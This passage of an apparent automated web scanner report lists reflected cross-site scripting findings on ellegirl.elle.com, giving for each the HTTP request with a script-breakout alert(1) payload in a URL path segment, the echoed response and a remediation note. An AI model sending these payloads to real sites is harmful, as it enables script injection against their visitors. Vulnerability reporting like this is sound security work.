The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16c4f</script><script>alert(1)</script>944078c8d38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content16c4f</script><script>alert(1)</script>944078c8d38/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:32:48 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30489
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:32:53 GMT
Date: Sat, 17 Sep 2011 16:32:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
2 = '';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content16c4f</script><script>alert(1)</script>944078c8d38/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;
...[SNIP]...
4.155. http://ellegirl.elle.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/wp-pagenavi/pagenavi-css.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cef8</script><script>alert(1)</script>419c289ac14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins5cef8</script><script>alert(1)</script>419c289ac14/wp-pagenavi/pagenavi-css.css?ver=2.70 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:34:29 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30489
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:34:32 GMT
Date: Sat, 17 Sep 2011 16:34:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins5cef8</script><script>alert(1)</script>419c289ac14/wp-pagenavi/pagenavi-css.css?ver=2.70';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/***
...[SNIP]...
4.156. http://ellegirl.elle.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/wp-pagenavi/pagenavi-css.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4919a</script><script>alert(1)</script>ac0601d1ca4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/wp-pagenavi4919a</script><script>alert(1)</script>ac0601d1ca4/pagenavi-css.css?ver=2.70 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:36:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30489
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:36:04 GMT
Date: Sat, 17 Sep 2011 16:36:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
'';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/wp-pagenavi4919a</script><script>alert(1)</script>ac0601d1ca4/pagenavi-css.css?ver=2.70';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* D
...[SNIP]...
4.157. http://ellegirl.elle.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/wp-pagenavi/pagenavi-css.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f66a</script><script>alert(1)</script>d622b1cc10d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/wp-pagenavi/pagenavi-css.css5f66a</script><script>alert(1)</script>d622b1cc10d?ver=2.70 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:37:38 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30489
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:37:41 GMT
Date: Sat, 17 Sep 2011 16:37:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
ocument.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/wp-pagenavi/pagenavi-css.css5f66a</script><script>alert(1)</script>d622b1cc10d?ver=2.70';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT ALTER ANYTH
...[SNIP]...
4.158. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/custom.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11f59</script><script>alert(1)</script>9a620afdc43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content11f59</script><script>alert(1)</script>9a620afdc43/themes/thesis/custom/custom.css?071911-52134 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:33:05 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30488
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:33:08 GMT
Date: Sat, 17 Sep 2011 16:33:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
2 = '';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content11f59</script><script>alert(1)</script>9a620afdc43/themes/thesis/custom/custom.css?071911-52134';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;
...[SNIP]...
4.159. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/custom.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad4f6</script><script>alert(1)</script>21eb1675a52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themesad4f6</script><script>alert(1)</script>21eb1675a52/thesis/custom/custom.css?071911-52134 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:34:44 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30488
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:34:47 GMT
Date: Sat, 17 Sep 2011 16:34:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themesad4f6</script><script>alert(1)</script>21eb1675a52/thesis/custom/custom.css?071911-52134';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/***
...[SNIP]...
4.160. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/custom.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aef11</script><script>alert(1)</script>e94b236c8a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesisaef11</script><script>alert(1)</script>e94b236c8a7/custom/custom.css?071911-52134 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:36:21 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30488
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:36:26 GMT
Date: Sat, 17 Sep 2011 16:36:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
rop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesisaef11</script><script>alert(1)</script>e94b236c8a7/custom/custom.css?071911-52134';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/**********
...[SNIP]...
4.161. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/custom.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df90a</script><script>alert(1)</script>d8745562ab3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/customdf90a</script><script>alert(1)</script>d8745562ab3/custom.css?071911-52134 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:37:54 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30488
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:37:58 GMT
Date: Sat, 17 Sep 2011 16:37:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
'';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/customdf90a</script><script>alert(1)</script>d8745562ab3/custom.css?071911-52134';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO
...[SNIP]...
4.162. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/custom.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9835</script><script>alert(1)</script>744ab790bb6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/custom/custom.cssb9835</script><script>alert(1)</script>744ab790bb6?071911-52134 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:39:11 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30488
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:39:13 GMT
Date: Sat, 17 Sep 2011 16:39:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/custom/custom.cssb9835</script><script>alert(1)</script>744ab790bb6?071911-52134';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT ALTER A
...[SNIP]...
4.163. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3eb1b</script><script>alert(1)</script>c07eceaf1b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content3eb1b</script><script>alert(1)</script>c07eceaf1b0/themes/thesis/custom/images/favicon.ico HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; __utma=216815426.1742872557.1316294793.1316294793.1316294793.1; __utmb=216815426.1.10.1316294793; __utmc=216815426; __utmz=216815426.1316294793.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:40:07 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30483
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:40:07 GMT
Date: Sat, 17 Sep 2011 16:40:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
2 = '';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content3eb1b</script><script>alert(1)</script>c07eceaf1b0/themes/thesis/custom/images/favicon.ico';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/*
...[SNIP]...
4.164. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94aae</script><script>alert(1)</script>a875ec5373e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes94aae</script><script>alert(1)</script>a875ec5373e/thesis/custom/images/favicon.ico HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; __utma=216815426.1742872557.1316294793.1316294793.1316294793.1; __utmb=216815426.1.10.1316294793; __utmc=216815426; __utmz=216815426.1316294793.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:40:29 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30483
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:40:30 GMT
Date: Sat, 17 Sep 2011 16:40:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes94aae</script><script>alert(1)</script>a875ec5373e/thesis/custom/images/favicon.ico';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/********
...[SNIP]...
4.165. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd0f1</script><script>alert(1)</script>9187e175436 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesiscd0f1</script><script>alert(1)</script>9187e175436/custom/images/favicon.ico HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
